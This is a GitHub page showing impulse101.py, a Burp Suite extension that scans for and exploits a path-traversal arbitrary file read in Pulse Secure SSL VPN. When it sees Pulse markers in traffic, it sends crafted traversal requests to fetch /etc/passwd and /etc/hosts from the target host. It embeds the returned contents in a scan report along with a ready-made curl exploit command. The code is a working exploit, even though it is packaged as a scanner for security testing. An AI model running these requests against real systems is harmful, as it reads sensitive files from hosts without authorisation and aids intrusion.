-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathimpulse101.py
142 lines (110 loc) · 4.78 KB
/
impulse101.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
from burp import IScannerCheck
from burp import IBurpExtender
from burp import IScanIssue
from java.io import PrintWriter
from array import array
from urlparse import urlparse
from os import path
from java.net import URL
import ssl
import socket
class BurpExtender(IBurpExtender,IScannerCheck):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.setExtensionName("Pulse SSL VPN Arbitrary File Read Scanner")
dout = PrintWriter(callbacks.getStdout(), True)
derr = PrintWriter(callbacks.getStderr(), True)
dout.println("Pulse SSL VPN Arbitrary File Read Scanner | by twitter.com/0x94")
callbacks.registerScannerCheck(self)
def _get_matches(self, response, match):
matches = []
start = 0
reslen = len(response)
matchlen = len(match)
while start < reslen:
start = self._helpers.indexOf(response, match, True, start, reslen)
if start == -1:
break
matches.append(array('i', [start, start + matchlen]))
start += matchlen
return matches
def etc_getir(self,host):
try:
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
sock = ctx.wrap_socket(socket.create_connection((host, 443)),server_hostname=host)
sock.send(b"GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1\r\nhost: "+host+"\r\n\r\n")
resp = sock.recv(4096)
if "root:x:0:0:root" in resp:
return resp
else:
return ""
except Exception as e:
print "Connection Error! "
return ""
def host_getir(self,host):
try:
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
sock = ctx.wrap_socket(socket.create_connection((host, 443)),server_hostname=host)
sock.send(b"GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/ HTTP/1.1\r\nhost: "+host+"\r\n\r\n")
resp = sock.recv(4096)
return resp
except Exception as e:
print "Connection Error! "
return ""
def altaal(self,data):
sonuc=""
for m in data.split("\n"):
sonuc+=m+"<br>"
return sonuc
def doPassiveScan(self, baseRequestResponse):
my=""
self.findkey=["/dana-na","Pulse Secure"]
for keyim in self.findkey:
matches = self._get_matches(baseRequestResponse.getResponse(), keyim)
if (len(matches) > 0):
x=str(self._helpers.analyzeRequest(baseRequestResponse).getUrl())
y=urlparse(x)
my=self.etc_getir(y.hostname)
if "root:x:0:0:root" in my:
etcpwd = "<p>"+(my)+"</p>"
hostsdata=self.host_getir(y.hostname)
text=self.altaal(etcpwd)+"</p><p>"+self.altaal(hostsdata)+"</p> info : <p> curl --path-as-is -s -k \"https://"+y.hostname+"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/\" </p>"
#text = ()
return [CustomScanIssue(
baseRequestResponse.getHttpService(),
self._helpers.analyzeRequest(baseRequestResponse).getUrl(),
[self._callbacks.applyMarkers(baseRequestResponse, None, matches)],
"Pulse SSL VPN Arbitrary File Read",
text,
"High")]
class CustomScanIssue(IScanIssue):
def __init__(self, httpService, url, httpMessages, name, detail, severity):
self._httpService = httpService
self._url = url
self._httpMessages = httpMessages
self._name = name
self._detail = detail
self._severity = severity
def getUrl(self):
return self._url
def getIssueName(self):
return self._name
def getIssueType(self):
return 0
def getSeverity(self):
return self._severity
def getConfidence(self):
return "Certain"
def getIssueBackground(self):
pass
def getRemediationBackground(self):
pass
def getIssueDetail(self):
return self._detail
def getRemediationDetail(self):
pass
def getHttpMessages(self):
return self._httpMessages
def getHttpService(self):
return self._httpService